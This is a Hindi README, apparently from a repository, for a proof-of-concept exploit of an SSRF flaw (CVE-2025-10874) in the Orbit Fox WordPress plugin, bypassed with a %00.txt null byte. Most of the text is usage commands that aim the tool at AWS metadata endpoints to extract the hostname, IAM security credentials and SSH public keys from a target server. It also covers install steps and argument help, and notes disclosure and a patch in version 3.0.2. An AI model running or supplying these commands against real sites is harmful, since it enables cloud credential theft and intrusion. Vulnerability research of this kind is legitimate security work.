
CVE-2025-10874 के लिए null byte injection बाईपास के साथ SSRF का प्रदर्शन करता है

Orbit Fox WordPress प्लगइन में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता को प्रदर्शित करने वाला प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, जिसमें नल बाइट इंजेक्शन बायपास शामिल है।
विस्तृत ब्लॉग पोस्ट: https://ryanmroth.com/articles/orbit-fox-ssrf
| विवरण | नोट्स |
|---|
| CVE ID: | CVE-2025-10874 |
| प्रभावित प्लगइन: | ThemeIsle द्वारा Orbit Fox |
| भेद्यता प्रकार: | सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) (CWE-918) |
| CVSS स्कोर: | 5.5 (मध्यम) |
| आवश्यक विशेषाधिकार: | Author+ (WordPress Author भूमिका या उच्चतर |
| फिक्स्ड संस्करण | 3.0.2+ |
Orbit Fox प्लगइन की MyStock इम्पोर्ट कार्यक्षमता में एक SSRF भेद्यता है जो Author+ विशेषाधिकार वाले प्रमाणित उपयोगकर्ताओं को WordPress सर्वर से मनमाने HTTP अनुरोध करने की अनुमति देती है। यह भेद्यता handle-request-mystock-import AJAX एक्शन में मौजूद है, जो URL पैरामीटर को ठीक से मान्य और सैनिटाइज़ करने में विफल रहता है।
यह एक्सप्लॉइट URL सत्यापन को दरकिनार करने के लिए नल बाइट इंजेक्शन बायपास (%00.txt) का लाभ उठाता है, जिससे सर्वर से सुलभ आंतरिक मेटाडेटा सेवाओं, क्लाउड प्रदाता APIs और अन्य नेटवर्क संसाधनों तक पहुंच संभव होती है।
http://169.254.169.254/latest/meta-data/hostnamehttp://169.254.169.254/latest/meta-data/iam/security-credentials/http://169.254.169.254/latest/meta-data/public-keys/0/openssh-keyrequests लाइब्रेरीurllib3 लाइब्रेरी# रिपॉजिटरी क्लोन करें
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874
# निर्भरताएँ इंस्टॉल करें (uv का उपयोग करके)
uv sync
# या pip का उपयोग करके
pip install requests urllib3
# AWS इंस्टेंस होस्टनाम निकालें (डिफ़ॉल्ट लक्ष्य)
python orbit_fox_poc.py http://target.com -u author -p password123
# कस्टम SSRF लक्ष्य URL निर्दिष्ट करें
python orbit_fox_poc.py http://target.com -u author -p password123 \
-s http://169.254.169.254/latest/meta-data/hostname
# IAM भूमिका क्रेडेंशियल निकालें
python orbit_fox_poc.py http://target.com -u author -p password123 \
-s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# SSH सार्वजनिक कुंजी निकालें
python orbit_fox_poc.py http://target.com -u author -p password123 \
-s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
# नल बाइट बायपास के बिना परीक्षण करें (पैच किए गए संस्करणों पर विफल होगा)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte
# समस्या निवारण के लिए डीबग आउटपुट सक्षम करें
python orbit_fox_poc.py http://target.com -u author -p password123 --debug
positional arguments:
target लक्ष्य WordPress URL (जैसे, http://example.com)
required arguments:
-u, --username WordPress उपयोगकर्ता नाम (Author+ भूमिका आवश्यक)
-p, --password WordPress पासवर्ड
optional arguments:
-h, --help सहायता संदेश दिखाएं और बाहर निकलें
-s, --ssrf-url SSRF के माध्यम से अनुरोध करने के लिए URL
(डिफ़ॉल्ट: http://169.254.169.254/latest/meta-data/hostname)
--no-nullbyte नल बाइट बायपास अक्षम करें (केवल बुनियादी SSRF परीक्षण)
--debug समस्या निवारण के लिए डीबग आउटपुट सक्षम करें
%00.txt जोड़ता हैhandle-request-mystock-import AJAX एंडपॉइंट पर तैयार अनुरोध भेजता हैhandle-request-mystock-import एक्शन के साथ admin-ajax.php के अनुरोधयह भेद्यता विक्रेता को जिम्मेदारी से प्रकट की गई थी और Orbit Fox संस्करण 3.0.2 में पैच की गई है। यह प्रूफ ऑफ कॉन्सेप्ट निम्नलिखित के लिए प्रदान किया गया है:
केवल अधिकृत सुरक्षा परीक्षण के लिए
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। उपयोगकर्ताओं को चाहिए:
लेखक इस टूल के दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
अंतिम अद्यतन: 2025-10-06